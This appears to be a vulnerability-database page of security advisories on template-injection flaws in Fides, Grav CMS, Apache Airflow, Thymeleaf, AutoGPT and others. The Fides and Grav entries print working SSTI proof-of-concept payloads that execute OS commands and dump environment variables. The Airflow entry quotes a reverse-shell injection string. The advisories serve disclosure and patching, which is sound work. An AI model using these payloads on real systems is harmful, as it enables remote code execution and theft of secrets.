CWE-1336
AllowedImproper Neutralization of Special Elements Used in a Template Engine
Abstraction: Base · Status: Incomplete
The product uses a template engine to insert or process externally-influenced input, but it does not neutralize or incorrectly neutralizes special elements or syntax that can be interpreted as template expressions or other code directives when processed by the engine.
313 vulnerabilities reference this CWE, most recent first.
GHSA-9XXF-6JW5-HPJG
Vulnerability from github – Published: 2025-11-28 00:30 – Updated: 2025-12-03 21:31An issue was discovered in Logpoint before 7.7.0. Sensitive information is exposed in System Processes for an extended period during high CPU load.
{
"affected": [],
"aliases": [
"CVE-2025-66361"
],
"database_specific": {
"cwe_ids": [
"CWE-1336"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-11-28T00:15:46Z",
"severity": "MODERATE"
},
"details": "An issue was discovered in Logpoint before 7.7.0. Sensitive information is exposed in System Processes for an extended period during high CPU load.",
"id": "GHSA-9xxf-6jw5-hpjg",
"modified": "2025-12-03T21:31:02Z",
"published": "2025-11-28T00:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66361"
},
{
"type": "WEB",
"url": "https://servicedesk.logpoint.com/hc/en-us/articles/29160993806749-Process-Data-Exposure-Under-High-Load"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-C34R-238X-F7QX
Vulnerability from github – Published: 2024-09-04 18:07 – Updated: 2024-11-18 16:27Summary
The Email Templating feature uses Jinja2 without proper input sanitization or rendering environment restrictions, allowing for Server-Side Template Injection that grants Remote Code Execution to privileged users. A privileged user refers to an Admin UI user with the default Owner or Contributor role, who can escalate their access and execute code on the underlying Fides Webserver container where the Jinja template rendering function is executed.
Details
The application enables the creation of message templates that are sent via email to Fides Privacy Center users (data subjects) who raise privacy requests such as data subject access requests or consent management requests via the Privacy Center. These emails are triggered at various points in the request processing flow, for example when a request is denied or approved. The messages are defined using Jinja2 templates, allowing the use of statement and expression directives to craft more complex messages that include dynamic variables.
It was discovered that the Jinja2 environment used to render the templates does not restrict the usage of common Python methods and objects, which permits an attacker to execute arbitrary code via Server-Side Template Injection. An attacker with the ability to modify email templates can inject malicious code, which is then executed when an email message is rendered and sent to the user.
Admin UI users assigned the following default roles are permitted to modify email templates and are therefore able to exploit this vulnerability: - Owner - Contributor
OAuth clients with the messaging-template:update scope are also authorized to use the PUT /api/v1/messaging/templates/ Fides Webserver API endpoint and may also exploit this vulnerability.
Impact
This vulnerability allows an attacker with sufficient privileges (Owner, Contributor, messaging-template:update) to execute arbitrary code remotely (Remote Code Execution) and escalate their privileges to those of a user on the Fides Webserver container. This escalated access grants the attacker control of the Fides Webserver application, including unauthorized access to integrated resources such as the hosted database, hosted cache, integrated data stores, and integrated SaaS applications. Potential impacts range from denial of service to the exfiltration of sensitive data unavailable to the user prior to the escalation of access.
Patches
The vulnerability has been patched in Fides version 2.44.0. Users are advised to upgrade to this version or later to secure their systems against this threat.
Workarounds
There are no workarounds.
PoC
The following payload, when injected into the email template, enables the execution of a command on the underlying system, revealing the content of environment variables:
Your privacy request has been denied.
*bb*
{% for s in ().__class__.__base__.__subclasses__() %}{% if "warning" in s.__name__ %}{{s()._module.__builtins__['__import__']('os').popen("env").read() }}{% endif %}
{% endfor %}
*aa*
The following HTTP request to the Fides Webserver API can be used to update a privacy request denial email template:
PUT /api/v1/messaging/templates/autogenerated-mes_ce649254-a90b-4073-ae12-193650064220 HTTP/2
Host: <redacted host>
Cookie: _fbp=fb.1.17232<..REDACTED>_ga=GA1.1.263756963.1723471626
Content-Length: 361
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"
Unescape-Safestr: true
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer eyJhbGciOiJkaXIiLCJlbmMiOiJBMjU..<REDACTED>
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: application/json
Access-Control-Allow-Origin: *
X-Fides-Source: fidesops-admin-ui
Sec-Ch-Ua-Platform: "Linux"
Accept: */*
Origin: https://<redacted host>
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://<redacted host>/messaging/autogenerated-mes_ce649254-a90b-4073-ae12-193650064220
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
{
"is_enabled": true,
"content":
{
"subject": "Your privacy request has been denied XXX",
"body": "Your privacy request has been denied. \n*bb*\n{% for s in ().__class__.__base__.__subclasses__() %}{% if \"warning\" in s.__name__ %}{{s()._module.__builtins__['__import__']('os').popen(\"env\").read() }}{% endif %}\n{% endfor %}\n*aa*\n**"
},
"properties":
[
"FDS-JICO87"
]
}
As a result, when a Privacy Center user submits a privacy request, such as to access their own data, and the request is rejected by a user of the privacy request management dashboard, the malicious template will be rendered, the code will be executed, and the content of the underlying container's environment variables will be included in the email the end-user receives.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "ethyca-fides"
},
"ranges": [
{
"events": [
{
"introduced": "2.19.0"
},
{
"fixed": "2.44.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-45053"
],
"database_specific": {
"cwe_ids": [
"CWE-1336",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2024-09-04T18:07:17Z",
"nvd_published_at": "2024-09-04T16:15:07Z",
"severity": "HIGH"
},
"details": "### Summary\nThe Email Templating feature uses Jinja2 without proper input sanitization or rendering environment restrictions, allowing for Server-Side Template Injection that grants Remote Code Execution to privileged users. A privileged user refers to an Admin UI user with the default `Owner` or `Contributor` role, who can escalate their access and execute code on the underlying Fides Webserver container where the Jinja template rendering function is executed.\n\n### Details\nThe application enables the creation of message templates that are sent via email to Fides Privacy Center users (data subjects) who raise privacy requests such as data subject access requests or consent management requests via the Privacy Center. These emails are triggered at various points in the request processing flow, for example when a request is denied or approved. The messages are defined using Jinja2 templates, allowing the use of statement and expression directives to craft more complex messages that include dynamic variables.\n\nIt was discovered that the Jinja2 environment used to render the templates does not restrict the usage of common Python methods and objects, which permits an attacker to execute arbitrary code via Server-Side Template Injection. An attacker with the ability to modify email templates can inject malicious code, which is then executed when an email message is rendered and sent to the user.\n\nAdmin UI users assigned the following default roles are permitted to modify email templates and are therefore able to exploit this vulnerability:\n- Owner\n- Contributor\n\nOAuth clients with the `messaging-template:update` scope are also authorized to use the `PUT /api/v1/messaging/templates/` Fides Webserver API endpoint and may also exploit this vulnerability.\n\n### Impact\nThis vulnerability allows an attacker with sufficient privileges (`Owner`, `Contributor`, `messaging-template:update`) to execute arbitrary code remotely (Remote Code Execution) and escalate their privileges to those of a user on the Fides Webserver container. This escalated access grants the attacker control of the Fides Webserver application, including unauthorized access to integrated resources such as the hosted database, hosted cache, integrated data stores, and integrated SaaS applications. Potential impacts range from denial of service to the exfiltration of sensitive data unavailable to the user prior to the escalation of access.\n\n### Patches\nThe vulnerability has been patched in Fides version `2.44.0`. Users are advised to upgrade to this version or later to secure their systems against this threat.\n\n### Workarounds\nThere are no workarounds.\n\n### PoC\nThe following payload, when injected into the email template, enables the execution of a command on the underlying system, revealing the content of environment variables:\n```jinja\nYour privacy request has been denied.\n*bb*\n{% for s in ().__class__.__base__.__subclasses__() %}{% if \"warning\" in s.__name__ %}{{s()._module.__builtins__[\u0027__import__\u0027](\u0027os\u0027).popen(\"env\").read() }}{% endif %}\n{% endfor %}\n*aa*\n```\n\nThe following HTTP request to the Fides Webserver API can be used to update a privacy request denial email template:\n```http\nPUT /api/v1/messaging/templates/autogenerated-mes_ce649254-a90b-4073-ae12-193650064220 HTTP/2\nHost: \u003credacted host\u003e\nCookie: _fbp=fb.1.17232\u003c..REDACTED\u003e_ga=GA1.1.263756963.1723471626\nContent-Length: 361\nSec-Ch-Ua: \"Not/A)Brand\";v=\"8\", \"Chromium\";v=\"126\", \"Google Chrome\";v=\"126\"\nUnescape-Safestr: true\nSec-Ch-Ua-Mobile: ?0\nAuthorization: Bearer eyJhbGciOiJkaXIiLCJlbmMiOiJBMjU..\u003cREDACTED\u003e\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\nContent-Type: application/json\nAccess-Control-Allow-Origin: *\nX-Fides-Source: fidesops-admin-ui\nSec-Ch-Ua-Platform: \"Linux\"\nAccept: */*\nOrigin: https://\u003credacted host\u003e\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: https://\u003credacted host\u003e/messaging/autogenerated-mes_ce649254-a90b-4073-ae12-193650064220\nAccept-Encoding: gzip, deflate, br\nAccept-Language: en-US,en;q=0.9\nPriority: u=1, i\n\n{\n \"is_enabled\": true,\n \"content\":\n {\n \"subject\": \"Your privacy request has been denied XXX\",\n \"body\": \"Your privacy request has been denied. \\n*bb*\\n{% for s in ().__class__.__base__.__subclasses__() %}{% if \\\"warning\\\" in s.__name__ %}{{s()._module.__builtins__[\u0027__import__\u0027](\u0027os\u0027).popen(\\\"env\\\").read() }}{% endif %}\\n{% endfor %}\\n*aa*\\n**\"\n },\n \"properties\":\n [\n \"FDS-JICO87\"\n ]\n}\n```\n\nAs a result, when a Privacy Center user submits a privacy request, such as to access their own data, and the request is rejected by a user of the privacy request management dashboard, the malicious template will be rendered, the code will be executed, and the content of the underlying container\u0027s environment variables will be included in the email the end-user receives.\n\n\u003cimg width=\"851\" alt=\"rce-email\" src=\"https://github.com/user-attachments/assets/97a395c6-b163-4656-b551-fe3dcd748813\"\u003e\n\n",
"id": "GHSA-c34r-238x-f7qx",
"modified": "2024-11-18T16:27:09Z",
"published": "2024-09-04T18:07:17Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/ethyca/fides/security/advisories/GHSA-c34r-238x-f7qx"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45053"
},
{
"type": "WEB",
"url": "https://github.com/ethyca/fides/commit/829cbd9cb5ef9c814fbac1ed6800e8d939d359c5"
},
{
"type": "PACKAGE",
"url": "https://github.com/ethyca/fides"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Remote Code Execution Vulnerability via SSTI in Fides Webserver Jinja Email Templating Engine"
}
GHSA-C85C-G9WV-PPH2
Vulnerability from github – Published: 2026-06-01 09:31 – Updated: 2026-07-09 20:52Apache Airflow's official documentation at core-concepts/dag-run.html ("Passing Parameters when triggering Dags") showed a verbatim BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}") example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had Dag.can_trigger permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the conf field of the trigger API: an authenticated trigger user could supply "; bash -i >& /dev/tcp/.../9999 0>&1; #" as a conf value and reach an os.exec on the worker. This CVE covers the documentation correction in apache/airflow PR 64129 — the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to apache-airflow 3.2.2 or later to pick up the corrected documentation shipped with the release.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "apache-airflow"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.2.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42252"
],
"database_specific": {
"cwe_ids": [
"CWE-1336"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-09T20:52:34Z",
"nvd_published_at": "2026-06-01T09:16:18Z",
"severity": "CRITICAL"
},
"details": "Apache Airflow\u0027s official documentation at `core-concepts/dag-run.html` (\"Passing Parameters when triggering Dags\") showed a verbatim `BashOperator(bash_command=\"echo value: {{ dag_run.conf[\u0027conf1\u0027] }}\")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `\"; bash -i \u003e\u0026 /dev/tcp/.../9999 0\u003e\u00261; #\"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 \u2014 the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release.",
"id": "GHSA-c85c-g9wv-pph2",
"modified": "2026-07-09T20:52:34Z",
"published": "2026-06-01T09:31:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42252"
},
{
"type": "WEB",
"url": "https://github.com/apache/airflow/pull/64129"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/airflow"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2026-184.yaml"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/8f4sc0rfn154jprmnwtmlst4p9zfw3w7"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Apache Airflow vulnerable to Improper Neutralization of Special Elements Used in a Template Engine"
}
GHSA-C9GP-64C4-2RRH
Vulnerability from github – Published: 2024-03-22 16:30 – Updated: 2024-03-22 16:30Summary
Grav CMS is vulnerable to a Server-Side Template Injection (SSTI), which allows any authenticated user (editor permissions are sufficient) to execute arbitrary code on the remote server bypassing the existing security sandbox.
Details
The Grav CMS implements a custom sandbox to protect the powerful Twig methods "registerUndefinedFunctionCallback()" and "registerUndefinedFilterCallback()", in order to avoid SSTI attacks by denying the calling of dangerous PHP functions into the Twig template directives (such as: "exec()", "passthru()", "system()", etc.). The current defenses are based on a blacklist of prohibited functions (PHP, Twig), checked through the "isDangerousFunction()" method called in the file "system/src/Grav/Common/Twig.php":
...
$this->twig = new TwigEnvironment($loader_chain, $params);
$this->twig->registerUndefinedFunctionCallback(function (string $name) use ($config) {
$allowed = $config->get('system.twig.safe_functions');
if (is_array($allowed) && in_array($name, $allowed, true) && function_exists($name)) {
return new TwigFunction($name, $name);
}
if ($config->get('system.twig.undefined_functions')) {
if (function_exists($name)) {
if (!Utils::isDangerousFunction($name)) {
user_error("PHP function {$name}() was used as Twig function. This is deprecated in Grav 1.7. Please add it to system configuration: `system.twig.safe_functions`", E_USER_DEPRECATED);
return new TwigFunction($name, $name);
}
/** @var Debugger $debugger */
$debugger = $this->grav['debugger'];
$debugger->addException(new RuntimeException("Blocked potentially dangerous PHP function {$name}() being used as Twig function. If you really want to use it, please add it to system configuration: `system.twig.safe_functions`"));
}
return new TwigFunction($name, static function () {});
}
return false;
});
$this->twig->registerUndefinedFilterCallback(function (string $name) use ($config) {
$allowed = $config->get('system.twig.safe_filters');
if (is_array($allowed) && in_array($name, $allowed, true) && function_exists($name)) {
return new TwigFilter($name, $name);
}
if ($config->get('system.twig.undefined_filters')) {
if (function_exists($name)) {
if (!Utils::isDangerousFunction($name)) {
user_error("PHP function {$name}() used as Twig filter. This is deprecated in Grav 1.7. Please add it to system configuration: `system.twig.safe_filters`", E_USER_DEPRECATED);
return new TwigFilter($name, $name);
}
...
In the code above it can be seen that the calls of the "isDangerousFunction()" are not performed when the method/filter in the "$name" variable has been considered safe. A function can be defined safe only by an administrator user, by adding it into the configuration properties "system.twig.safe_functions" and/or "system.twig.safe_filters" (a sort of whitelists that by default are empty) of the configuration file "system/config/system.yaml".
It is to note that within the "system/src/Grav/Common/Twig.php" file a Twig class is defined (with its constructor, methods and attributes) and in particular the Twig object (and environment) is instantiated on it:
/**
* Class Twig
* @package Grav\Common\Twig
*/
class Twig
{
/** @var Environment */
public $twig;
/** @var array */
public $twig_vars = [];
/** @var array */
public $twig_paths;
/** @var string */
public $template;
...
/**
* Constructor
*
* @param Grav $grav
*/
public function __construct(Grav $grav)
{
$this->grav = $grav;
$this->twig_paths = [];
}
/**
* Twig initialization that sets the twig loader chain, then the environment, then extensions
* and also the base set of twig vars
*
* @return $this
*/
public function init()
{
if (null === $this->twig) {
/** @var Config $config */
$config = $this->grav['config'];
...
Since the security sandbox does not protect the Twig object it is possible to interact with it (e.g. call its methods, read/write its attributes) through opportunely crafted Twig template directives injected on a web page. Then an authenticated editor user could be able to add arbitrary functions into the Twig attributes "system.twig.safe_functions" and "system.twig.safe_filters" in order to circumvent the Grav CMS sandbox.
PoC
An authenticated user with the permissions to edit a page (having Twig processing enabled) on the Grav CMS admin console, could create/edit a web page containing a malicious template directive to execute arbitrary OS commands on the remote web server. For instance, in order to abuse the vulnerability and execute the prohibited "system('id')" code, bypassing the sandbox, the editor could generate a web page containing the following template directives:
{% set arr = {'1':'system', '2':'foo'} %}
{{ var_dump(grav.twig.twig_vars['config'].set('system.twig.safe_functions', arr)) }}
{{ system('id') }}
Once saved the malicious page could be accessed by unauthenticated users to execute the "system('id')" code on the remote server hosting the vulnerable Grav CMS.
Impact
It is possible to execute remote code on the underlying server and compromise it.
Tested version
Grav CMS v1.7.43
Reported by
Maurizio Siddu
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "getgrav/grav"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.7.45"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-28116"
],
"database_specific": {
"cwe_ids": [
"CWE-1336",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2024-03-22T16:30:26Z",
"nvd_published_at": "2024-03-21T22:15:11Z",
"severity": "HIGH"
},
"details": "### Summary\nGrav CMS is vulnerable to a Server-Side Template Injection (SSTI), which allows any authenticated user (editor permissions are sufficient) to execute arbitrary code on the remote server bypassing the existing security sandbox.\n\n### Details\nThe Grav CMS implements a custom sandbox to protect the powerful Twig methods \"registerUndefinedFunctionCallback()\" and \"registerUndefinedFilterCallback()\", in order to avoid SSTI attacks by denying the calling of dangerous PHP functions into the Twig template directives (such as: \"exec()\", \"passthru()\", \"system()\", etc.). \nThe current defenses are based on a blacklist of prohibited functions (PHP, Twig), checked through the \"isDangerousFunction()\" method called in the file \"system/src/Grav/Common/Twig.php\":\n\n```php\n...\n$this-\u003etwig = new TwigEnvironment($loader_chain, $params);\n\n$this-\u003etwig-\u003eregisterUndefinedFunctionCallback(function (string $name) use ($config) {\n $allowed = $config-\u003eget(\u0027system.twig.safe_functions\u0027);\n if (is_array($allowed) \u0026\u0026 in_array($name, $allowed, true) \u0026\u0026 function_exists($name)) {\n return new TwigFunction($name, $name);\n }\n if ($config-\u003eget(\u0027system.twig.undefined_functions\u0027)) {\n if (function_exists($name)) {\n if (!Utils::isDangerousFunction($name)) {\n user_error(\"PHP function {$name}() was used as Twig function. This is deprecated in Grav 1.7. Please add it to system configuration: `system.twig.safe_functions`\", E_USER_DEPRECATED);\n\n return new TwigFunction($name, $name);\n }\n\n /** @var Debugger $debugger */\n $debugger = $this-\u003egrav[\u0027debugger\u0027];\n $debugger-\u003eaddException(new RuntimeException(\"Blocked potentially dangerous PHP function {$name}() being used as Twig function. If you really want to use it, please add it to system configuration: `system.twig.safe_functions`\"));\n }\n\n return new TwigFunction($name, static function () {});\n }\n\n return false;\n});\n\n$this-\u003etwig-\u003eregisterUndefinedFilterCallback(function (string $name) use ($config) {\n $allowed = $config-\u003eget(\u0027system.twig.safe_filters\u0027);\n if (is_array($allowed) \u0026\u0026 in_array($name, $allowed, true) \u0026\u0026 function_exists($name)) {\n return new TwigFilter($name, $name);\n }\n if ($config-\u003eget(\u0027system.twig.undefined_filters\u0027)) {\n if (function_exists($name)) {\n if (!Utils::isDangerousFunction($name)) {\n user_error(\"PHP function {$name}() used as Twig filter. This is deprecated in Grav 1.7. Please add it to system configuration: `system.twig.safe_filters`\", E_USER_DEPRECATED);\n return new TwigFilter($name, $name);\n }\n...\n```\nIn the code above it can be seen that the calls of the \"isDangerousFunction()\" are not performed when the method/filter in the \"$name\" variable has been considered safe. A function can be defined safe only by an administrator user, by adding it into the configuration properties \"system.twig.safe_functions\" and/or \"system.twig.safe_filters\" (a sort of whitelists that by default are empty) of the configuration file \"system/config/system.yaml\".\n\nIt is to note that within the \"system/src/Grav/Common/Twig.php\" file a Twig class is defined (with its constructor, methods and attributes) and in particular the Twig object (and environment) is instantiated on it:\n```php\n/**\n * Class Twig\n * @package Grav\\Common\\Twig\n */\nclass Twig\n{\n /** @var Environment */\n public $twig;\n /** @var array */\n public $twig_vars = [];\n /** @var array */\n public $twig_paths;\n /** @var string */\n public $template;\n...\n /**\n * Constructor\n *\n * @param Grav $grav\n */\n public function __construct(Grav $grav)\n {\n $this-\u003egrav = $grav;\n $this-\u003etwig_paths = [];\n }\n\n /**\n * Twig initialization that sets the twig loader chain, then the environment, then extensions\n * and also the base set of twig vars\n *\n * @return $this\n */\n public function init()\n {\n if (null === $this-\u003etwig) {\n /** @var Config $config */\n $config = $this-\u003egrav[\u0027config\u0027];\n...\n```\nSince the security sandbox does not protect the Twig object it is possible to interact with it (e.g. call its methods, read/write its attributes) through opportunely crafted Twig template directives injected on a web page. \nThen an authenticated editor user could be able to add arbitrary functions into the Twig attributes \"system.twig.safe_functions\" and \"system.twig.safe_filters\" in order to circumvent the Grav CMS sandbox.\n\n\n### PoC\nAn authenticated user with the permissions to edit a page (having Twig processing enabled) on the Grav CMS admin console, could create/edit a web page containing a malicious template directive to execute arbitrary OS commands on the remote web server.\nFor instance, in order to abuse the vulnerability and execute the prohibited \"system(\u0027id\u0027)\" code, bypassing the sandbox, the editor could generate a web page containing the following template directives:\n```\n{% set arr = {\u00271\u0027:\u0027system\u0027, \u00272\u0027:\u0027foo\u0027} %}\n{{ var_dump(grav.twig.twig_vars[\u0027config\u0027].set(\u0027system.twig.safe_functions\u0027, arr)) }}\n{{ system(\u0027id\u0027) }}\n```\nOnce saved the malicious page could be accessed by unauthenticated users to execute the \"system(\u0027id\u0027)\" code on the remote server hosting the vulnerable Grav CMS.\n\n\n### Impact\nIt is possible to execute remote code on the underlying server and compromise it.\n\n\n### Tested version\nGrav CMS v1.7.43\n\n\n### Reported by\nMaurizio Siddu",
"id": "GHSA-c9gp-64c4-2rrh",
"modified": "2024-03-22T16:30:26Z",
"published": "2024-03-22T16:30:26Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/getgrav/grav/security/advisories/GHSA-c9gp-64c4-2rrh"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28116"
},
{
"type": "WEB",
"url": "https://github.com/getgrav/grav/commit/4149c81339274130742831422de2685f298f3a6e"
},
{
"type": "PACKAGE",
"url": "https://github.com/getgrav/grav"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Server-Side Template Injection (SSTI) with Grav CMS security sandbox bypass"
}
GHSA-C9PH-GXWW-7744
Vulnerability from github – Published: 2026-05-04 21:15 – Updated: 2026-05-13 16:43Impact
A security bypass vulnerability exists in the expression execution mechanisms of Thymeleaf up to and including 3.1.4.RELEASE. Although the library provides mechanisms to avoid the execution of potentially dangerous expressions in some specific sandboxed (restricted) contexts, it fails to properly neutralize specific constructs that allow this kind of expressions to be executed. If an application developer passes to the template engine unsanitized variables that contain such expressions, and these values are used in sandboxed contexts inside the templates, these expressions can be executed achieving Server-Side Template Injection (SSTI).
Patches
This has been fixed in Thymeleaf 3.1.5.RELEASE. All users are advised to upgrade immediately.
Workarounds
No workaround is available beyond ensuring applications do not pass unvalidated/unsanitized data directly to the template engine. Upgrading to 3.1.5.RELEASE is strongly recommended in any case.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.1.4.RELEASE"
},
"package": {
"ecosystem": "Maven",
"name": "org.thymeleaf:thymeleaf"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.5.RELEASE"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.1.4.RELEASE"
},
"package": {
"ecosystem": "Maven",
"name": "org.thymeleaf:thymeleaf-spring5"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.5.RELEASE"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.1.4.RELEASE"
},
"package": {
"ecosystem": "Maven",
"name": "org.thymeleaf:thymeleaf-spring6"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.5.RELEASE"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-41901"
],
"database_specific": {
"cwe_ids": [
"CWE-1336",
"CWE-917"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-04T21:15:20Z",
"nvd_published_at": "2026-05-12T23:16:17Z",
"severity": "CRITICAL"
},
"details": "### Impact\n\nA security bypass vulnerability exists in the expression execution mechanisms of Thymeleaf up to and including 3.1.4.RELEASE. Although the library provides mechanisms to avoid the execution of potentially dangerous expressions in some specific sandboxed (restricted) contexts, it fails to properly neutralize specific constructs that allow this kind of expressions to be executed. If an application developer passes to the template engine unsanitized variables that contain such expressions, and these values are used in sandboxed contexts inside the templates, these expressions can be executed achieving Server-Side Template Injection (SSTI).\n\n### Patches\n\nThis has been fixed in Thymeleaf 3.1.5.RELEASE. All users are advised to upgrade immediately.\n\n### Workarounds\n\nNo workaround is available beyond ensuring applications do not pass unvalidated/unsanitized data directly to the template engine. Upgrading to 3.1.5.RELEASE is strongly recommended in any case.",
"id": "GHSA-c9ph-gxww-7744",
"modified": "2026-05-13T16:43:36Z",
"published": "2026-05-04T21:15:20Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/thymeleaf/thymeleaf/security/advisories/GHSA-c9ph-gxww-7744"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41901"
},
{
"type": "PACKAGE",
"url": "https://github.com/thymeleaf/thymeleaf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Sandboxed Thymeleaf expressions vulnerable to improper recognition of unauthorized syntax patterns"
}
GHSA-CJJC-MF84-XP9F
Vulnerability from github – Published: 2025-03-20 12:32 – Updated: 2025-03-20 12:32AutoGPT versions 0.3.4 and earlier are vulnerable to a Server-Side Template Injection (SSTI) that could lead to Remote Code Execution (RCE). The vulnerability arises from the improper handling of user-supplied format strings in the AgentOutputBlock implementation, where malicious input is passed to the Jinja2 templating engine without adequate security measures. Attackers can exploit this flaw to execute arbitrary commands on the host system. The issue is fixed in version 0.4.0.
{
"affected": [],
"aliases": [
"CVE-2025-1040"
],
"database_specific": {
"cwe_ids": [
"CWE-1336",
"CWE-77"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-20T10:15:53Z",
"severity": "HIGH"
},
"details": "AutoGPT versions 0.3.4 and earlier are vulnerable to a Server-Side Template Injection (SSTI) that could lead to Remote Code Execution (RCE). The vulnerability arises from the improper handling of user-supplied format strings in the `AgentOutputBlock` implementation, where malicious input is passed to the Jinja2 templating engine without adequate security measures. Attackers can exploit this flaw to execute arbitrary commands on the host system. The issue is fixed in version 0.4.0.",
"id": "GHSA-cjjc-mf84-xp9f",
"modified": "2025-03-20T12:32:52Z",
"published": "2025-03-20T12:32:52Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1040"
},
{
"type": "WEB",
"url": "https://github.com/significant-gravitas/autogpt/commit/6dba31e0215549604bdcc1aed24e3a1714e75ee2"
},
{
"type": "WEB",
"url": "https://huntr.com/bounties/b74ef75f-61d5-4422-ab15-9550c8b4f185"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-CPWX-VRP4-4PQ7
Vulnerability from github – Published: 2025-03-05 20:40 – Updated: 2025-11-03 22:54An oversight in how the Jinja sandboxed environment interacts with the |attr filter allows an attacker that controls the content of a template to execute arbitrary Python code.
To exploit the vulnerability, an attacker needs to control the content of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications which execute untrusted templates.
